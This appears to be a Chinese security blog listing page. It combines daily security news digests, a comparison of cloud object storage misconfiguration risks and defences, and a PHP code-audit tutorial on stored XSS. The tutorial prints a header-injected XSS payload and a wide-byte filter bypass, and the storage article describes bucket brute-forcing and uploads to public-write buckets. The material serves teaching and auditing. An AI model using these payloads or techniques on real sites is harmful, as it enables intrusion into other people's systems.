8、Barracuda最新报告显示:有 92% 的企业曾遭遇社工攻击 https://www.freebuf.com/news/403895.html 据Barracuda公司的最新报告显示, 2023 年,有约 92% 的企业平均在一年内经历了 6 次因电子邮件社交工程攻击导致的凭据泄露事件。 9、Kraken 加密货币交易所因零日漏洞遭窃300万美元 https://thehackernews.com/2024/06/kraken-crypto-exchange-hit-by-3-million.html 加密货币交易所 Kraken 透露,一名未透露姓名的安全研究人员利用其平台中“极其严重”的零日漏洞窃取了价值 300 万美元的数字资产,并拒绝归还。 10、洛杉矶公共卫生局披露大规模数据泄露事件 https://www.infosecurity-magazine.com/news/los-angeles-health-data-breach/ 公共卫生部表示: "虽然公共卫生部无法确认信息是否被访问或滥用,但我们鼓励个人与医疗服务提供者一起审查其医疗记录中的信息内容和准确性。" 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
云上宝库:三大厂商对象存储安全性及差异性比较
前言 看了几家云厂商的对象存储,使用上有相似也有差异,聊聊阿里云、腾讯云、京东云三家对象存储在使用中存在的风险以及防护措施。 0x01 云存储命名 阿里云对象存储OSS(Object Storage Service),新用户免费试用三个月,存储包容量规格20G三个月. 腾讯云对象存储 COS(Cloud Object Storage),新用户标准存储容量包,有效期6个月(180天),个人用户50GB6个月,企业用户1T六个月。 京东云对象存储OSS(Object Storage Service) ,目前无限制,存储包容量规格10G/月,请求次数50W次/月的标准,低于标准一直免费使用。 0x02 云存储空间创建 阿里云 创建存储桶Bucket的名称唯一设置和地域没有关系,创建存储桶后的域名规则为:<BucketName>.oss.<Region>.aliyuncs.com 腾讯云 腾讯云创建存储桶名称唯一跟低于也无关系,其名称构成<BucketName-APPID>.cos.<Region>.myqcloud.com 京东云 京东云的bucket地域只有四个,命令规则为<BucketName>.s3.<position>-id.jdcloud-oss.com 华北 华东 0x03 云存储API密钥存储 阿里云 进入 离开创建页面后无法获取SK,需提前保存SK,后期无法查看 这里用户权限需要授权 如果未授权,则Forbiden访问 腾讯云 创建AK/SK后期无法查询,密钥存储要求上基本与阿里云一致。 京东云 京东云需要首先设置AccessKey,否则无法操作存储桶。 AccessKey创建后可AS查看 0x04 云存储常见安全问题 1. 配置不当导致的安全问题 阿里云 阿里云设置公有读 存储桶内的文件可被读取,虽然无法直接list对象,但是可以通过爆破的方式读取文件内容 当设置包含listobject时,web访问存储桶直接可遍历对象 当Bucket的权限设置为公共读写的时候,是可以直接使用PUT方式上传文件到存储桶内,这种配置会导致桶内文件来源的真实性无法保证 文件上传成功 腾讯云 腾讯云的存储桶权限和阿里云类似,描述不同,当非公共读写、非私有的条件下是可以遍历桶内文件的 存储桶内的文件可被读取,虽然无法直接list对象,但是可以通过爆破的方式读取文件内容 公共读写权限配置后可直接上传 京东云 京东云在Bucket的权限上和阿里、腾讯基本一致,非私有状态下,也存在Bucket文件可遍历 上传txt 文件写入成功 风险 针对配置不当,可能产生的风险在于 数据泄露: 配置不当可能导致存储桶中的敏感数据被公开访问,如用户个人信息、敏感文件等。 后渗透风险:桶内数据来源的真实性面向用户无法保障,且对用户的安全性造成影响,可利用该漏洞进行供应链攻击。 2.策略配置不当导致的安全风险 针对三家厂商的存储桶,阿里云bucket授权策略 腾讯云Policy策略 这两家比较类似 京东云CORS跨域规则 规则添加简单测试还是比较友好的 风险 规则配置可能会导致存储桶敏感文件泄露,比如说规则设置添加遍历存储桶对象等。 3.存储桶爆破 阿里云 阿里云针对存储桶的回显返回值不同 无Bucket 腾讯云 腾讯云的回显 京东云 风险 虽然三家的产品根据回显值均可以爆破,如果从利用角度来讲,需要配合前面的配置不当才能继续后渗透,从爆破的角度来讲,腾讯云的域名构成<BucketName-APPID>.cos.<Region>.myqcloud.com的爆破存储桶的风险可以说是最低的,甚至可以说基本上不用考虑。目前下载大量的存储桶在业务中的应用可能最常见的是图片文件云存储利用,一般是不设置域名绑定存储桶的。 4.AK/SK泄露 AK 和 SK 泄露可能被恶意用户用于未经授权的访问云服务资源,导致数据泄露、篡改或删除等安全问题。针对不同厂商目前有工具可直接利用泄露的AK/SK接管存储桶。 针对不同厂商对象存储AK/SK的创建用户的权限划风险需要注意 阿里云RAM访问控制 腾讯云用户访问管理权限分配 京东云 用户授权 用户权限配置不当,会导致云服务被完全接管。 0x05 云存储防护 加强身份验证和访问控制: 使用身份和访问管理(IAM)来限制对存储桶和其中对象的访问。确保只有授权的用户或服务能够访问,并严格控制他们的权限,采用最小权限原则。 加密数据: 对于敏感数据,采用适当的加密措施,包括数据在传输和静态存储时的加密。 网络安全配置: 配置网络安全组、防火墙等措施,限制对存储桶的访问仅来自可信来源,减少公开访问的风险。 监控和日志记录: 设置监控警报,对存储桶的访问和活动进行实时监控,并记录审计日志,以便及时发现异常行为或潜在的安全威胁。 定期备份和恢复: 定期备份存储桶中的重要数据,并建立有效的恢复计划,以防止数据丢失或损坏,例如意外删除或勒索软件攻击。 防止公开访问误配置: 定期审查存储桶的访问权限配置,确保没有意外的公开访问权限,避免因配置错误导致数据泄露的风险。 实施访问限制策略: 使用 IP 白名单或访问令牌等策略,限制存储桶的访问仅限于授权的用户或系统。
代码审计中XSS挖掘一些体会
0x01 XSS的挖掘思路 1.1 反射型 直接搜索 echo print_r print之类的函数即可也可以寻找$_GET变量来判断是否存在输出(不过对于代码审计来说除非实在挖不出漏洞,否则没必要关注反射xss) 1.2 dom型 和反射型差不多需要看网站的前端javascript(一般安装好网页直接查看源代码即可,和反射xss一样代码审计没必要太过于关注)。但是也和反射型有区别,domxss是不经过服务器处理的,也就是不需要经过后端代码,需要审计javascript。 1.3 存储型xss 对于代码审计,存储型xss才是需要关注的重点。 存储型xss一般是存在有数据库交互的地方,因为需要把数据写入进去数据库中才能长期储存数据。 所以我们在审计存储型xss的时候会关注数据库交互的地方。 这里举例两种思路: 思路一 : 从数据库类文件中开始审计 什么是数据库类文件呢?其实在实际开发项目过程中,通常程序员都会把数据库操作封装成一个类来提供操作。 比如说我们需要设计一个留言板,留言板最基本得有这几个功能吧。比如说发表留言,查看留言,回复留言,删除留言,修改留言等等功能。 而这些是不是需要使用数据库来实现这类功能(下面用代码配合伪代码示意,注意代码可以不用理解功能,但是要能够理解代码为什么要这样写。) # 比如用户发表一条留言 # uname就是用户名也就是"小明",content就是内容也就是"你好" insert into text(id, uname, content) value(1, '小明', '你好'); # 然后用户发现你好不太恰当,想删掉替换成您好 delete from text where id = 1; # id就是数据库用于区分不同数据的字段, delete from 表示删除表里面的内容 text表示需要删除的表 # 表示删除id=1的数据 where id = 1 # 那么php中的代码是这样看小明的: $sql = "insert into text(id, uname, content) value(1, '小明', '你好')"; // $conn就是我们数据库的链接 mysqli_query($conn, $sql); $sql = "delete from text where id = 1"; mysqli_query($conn, $sql); // 小明换成了您好 $sql = "insert into text(id, uname, content) value(2, '小明', '您好')"; mysqli_query($conn, $sql); $sql = "delete from text where id = 2"; mysqli_query($conn, $sql); # 这样的代码是不是特别麻烦 把他简化一下(把sql查询做成一个函数) function sql_insert($name, $content){ $sql = "insert into text(id, uname, content) value(1, '{$name}', '{$content}',哈哈哈哈')"; mysqli_query($conn,$sql); } function sql_delete($id){ $sql = "delete from text where id = '{$id}'"; mysqli_query($conn,$sql); } // 好的封装完成了 这时候小明发送你好 sql_insert('小明', "你好"); sql_delete(1); // 想删除 // 发送您好 sql_insert('小明', "您好"); sql_delete(2); // 又删除 # 这样是不是无论小明发多少条留言都能够很轻松的删除插入 # 好了 这就是封装成的作用(把重复的操作放在一起) # 这里是写完了,但是还是有一个问题,比如遇到sql注入怎么办。遇到xss怎么办。 # 很简单!只需要修改我们定义的两个操作函数即可 function sql_insert($name, $content){ $name = htmlspecialchars(addslashes($name)); $content = htmlspecialchars(addslashes($content)); // 添加了转义 $sql = "insert into text(id, uname, content) value(1, '{$name}', '{$content}')"; mysqli_query($conn,$sql); } function sql_delete($id){ $id = intval($id); // 强制转换 $sql = "delete from text where id = '{$id}'"; mysqli_query($conn,$sql); } # 是不是这样的写法很方便,如果我们不定义一个函数集中操作的话每次拼接sql语句都需要添加htmlspecialchars和addlashes # 这就是我们为什么要寻找数据库操作文件的意义。(因为程序员很有可能把过滤函数写在sql类中) 好了,进入正题。 关于如何找到sql封装文件,很简单。 搜索关键字即可(new mysqli, mysqli,pdo)这里拿其他cms来实例(phpems架构比较复杂也就是上课时用的cms)这里我使用yixuncms_v2.0.3 打开文件,全局搜索 第二步 分析文件的功能 查找需要的关键函数 直接跟进query函数 查看是否有过滤 右键定位函数 定位escape_string_array函数 然后跟进审计 思路二: 使用输出函数进行动态输出查看是否过滤 因为源代码在我们服务器上,我们可以使用echo或者var_dump查看过滤后的结果来判断过滤了什么。 由于我们不知道在程序在哪个页面做了sql查询,所以选择登录功能作为测试点 因为可以知道一点,那就是登陆功能一定是做了sql查询的,除非是前端登陆,而前端登陆本身也就是一个漏洞... 知道了这一点,登陆抓包,登陆账号密码有没有都不要紧。 我这里使用错误的账号密码登陆: 返回了一个操作失败 然后我们根据提示去全局搜索: 操作失败 至于为什么是这三个呢? 因为我们抓到的数据表访问的就是这个路径 进入app.php 然后定位getUserByUserName函数 然后就可以添加代码进行调试了(修改后记得保存 快捷键 ctrl + s) 再次发包进行调试发现已经返回sql语句了 思路在这里完结了。下面是漏洞复现 0x02 漏洞的复现 因为上面已经知道了xss和sql在普通参数里面不存在,然后正常注册后登陆发现 那么直接根据注册ip搜索 跟进后再次全局搜索 由于程序开发中默认ip地址是安全的一般很少会进行过滤,所以这里直接猜测ip地址不存在过滤。 然后注册账号进行测试 payload:Client-ip: <svg/onload=alert(1)> 然后放包,发现个人中心已经存储了我们的xss 同理,这里没有经过过滤也是存在注入的。这里就不在演示 0x03 总结 xss加固可以在前端或者后端实体编码 同时也要注意对单双引号的转义。 不要以为获取ip就是安全的,获取ip往往是不安全的。 思路 -》 找过滤函数 -》测试过滤是否有遗漏 -》 测试可能没有经过过滤的参数 有些网站会把在属性内的参数使用反斜杠编码.比如你输入 &url="onerror=alert(1) 双引号会被转义成/",这时如果网站的编码是gb2312...之类的可以使用宽字节 %df"的方式绕过
网络安全日报 2024年06月19日
1、伦敦医院遭遇勒索软件攻击取消800多次手术计划 https://www.england.nhs.uk/london/2024/06/14/update-on-cyber-incident-clinical-impact-in-south-east-london-friday-14-june-2024/ NHS英格兰媒体今天透露,受上周Synnovis医疗联合组织遭遇勒索软件攻击事件的影响,多家伦敦医院被迫取消了数百次计划的手术预约。Synnovis医疗联合组织前身为Viapath,于2009年作为GSTS Pathology成立,并在2022年10月更名为Synnovis,该组织由SYNLAB(英国及爱尔兰公司)、盖伊圣托马斯NHS信托基 2、制造业巨头Keytronic遭遇勒索软件攻击后泄露数据 https://www.bleepingcomputer.com/news/security/keytronic-confirms-data-breach-after-ransomware-gang-leaks-stolen-files/ PCBA制造业巨头Keytronic警告称,两周前黑客组织Black Basta泄露了该公司530GB数据。Key Tronic(更广为人知的名称为Keytronic)是一家美国科技公司,最初作为键盘和鼠标的原始设备制造商(OEM),现在是全球最大的印刷电路板组装(PCBA)制造商之一。上个月,Keytronic在一份SEC文件中披露,5月6日曾遭遇了一次 3、Firefox现已支持设备级别登录凭证保护措施 https://www.mozilla.org/en-US/firefox/127.0/releasenotes/ Mozilla Firefox目前已支持允许您使用设备级别的登录信息(包括操作系统凭证、指纹、PIN或其他生物识别技术)进一步保护对浏览器密码管理器中存储凭据的访问。需要明确的是,这个新功能并不能防止信息窃取恶意软件的攻击,而是防御具有近源或远程访问设备能力的人员在未经身份验证的情况下获取您设备中存储的凭据。 4、微软宣布Outlook个人账户即将迎来新的安全变更 http://techcommunity.microsoft.com/t5/outlook-blog/keeping-our-outlook-personal-email-users-safe-reinforcing-our/ba-p/4164184 作为微软“安全未来计划”的一部分,微软宣布了针对Outlook个人电子邮件账户的网络安全增强措施,包括在2024年9月16日之前弃用基本身份验证方案(用户名+密码)。该软件巨头还宣布将停止支持Windows上的“邮件”和“日历”应用程序,弃用Outlook Light,并取消用户通过Outlook.com访问Gmail账户的功能。 5、Meta因隐私问题暂停使用欧盟用户的数据训练AI https://about.fb.com/news/2024/06/building-ai-technology-for-europeans-in-a-transparent-and-responsible-way/ Meta周五表示,应爱尔兰数据保护委员会(DPC)的要求,正在推迟使用在Facebook和Instagram上成人用户的公共内容来训练其大型语言模型(LLMs)。Meta公司对不得不暂停其AI计划表示失望,虽然其已考虑到了监管机构和该地区数据保护机构的反馈。据称Meta计划的使用个人数据来训练其人工智能(AI)模型无需获得用户的明确同意,而是依赖于该区域的法律基础来处理该地区的 6、ASUS警告7款路由器存在严重远程身份验证绕过漏洞 https://www.twcert.org.tw/tw/cp-132-7859-0e104-1.html ASUS发布了新的固件更新,以解决影响七款路由器型号的严重漏洞,该漏洞允许远程攻击者登录设备。该漏洞被追踪为CVE-2024-3080(CVSS v3.1评分:9.8“严重”),是一种身份验证绕过漏洞,允许未经身份验证的远程攻击者接管设备。 7、VMware 修复了vCenter 中的 RCE 和提权漏洞 https://securityaffairs.com/164659/hacking/vmware-fixed-vcenter-server-flaws.html VMware 解决了可能允许远程代码执行或权限提升的 vCenter Server 漏洞。vCenter Server 在 DCERPC 协议的实施过程中存在多个堆溢出漏洞,编号为 CVE-2024-37079、CVE-2024-37080(最高 CVSSv3 基本分数 9.8)。该公司发布的公告称: “具有 vCenter Server 网络访问权限的恶意行为者可能会通过发送特制的网络数据包来触发这些漏洞,从而可能导致远程代码执 8、虚假的谷歌浏览器错误诱导用户运行恶意PowerShell脚本 https://www.freebuf.com/news/403837.html Proofpoint的安全研究人员近期注意到有多个黑客组织正利用虚假的谷歌 Chrome浏览器、Word 和 OneDrive 等程序的运行错误来诱导用户安装运行带有恶意 PowerShell的修复程序。据观察,这些黑客组织包括 ClearFake和TA571。 9、勒索攻击迫使越南国家邮政服务瘫痪超3天 https://www.secrss.com/articles/67105 据当地媒体报道,越南邮政于6月4日遭到勒索软件攻击,邮政和快递服务受到影响。该公司当时报告称,旗下邮政金融、公共物流和货物分发服务未受影响。 10、新的 Linux 恶意软件利用Discord和表情符号作为C2 https://www.freebuf.com/news/403792.html 网络安全公司 Volexity 近日发现有一个高级持续性威胁(APT)利用 Discord 和表情符号作为命令和控制 (C2) 平台在受感染的设备上执行命令,使其绕过寻找基于文本的命令的安全软件,攻击了印度的政府机构。该恶意软件允许威胁行为者执行命令、截屏、窃取文件、部署其他有效负载和搜索文件。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页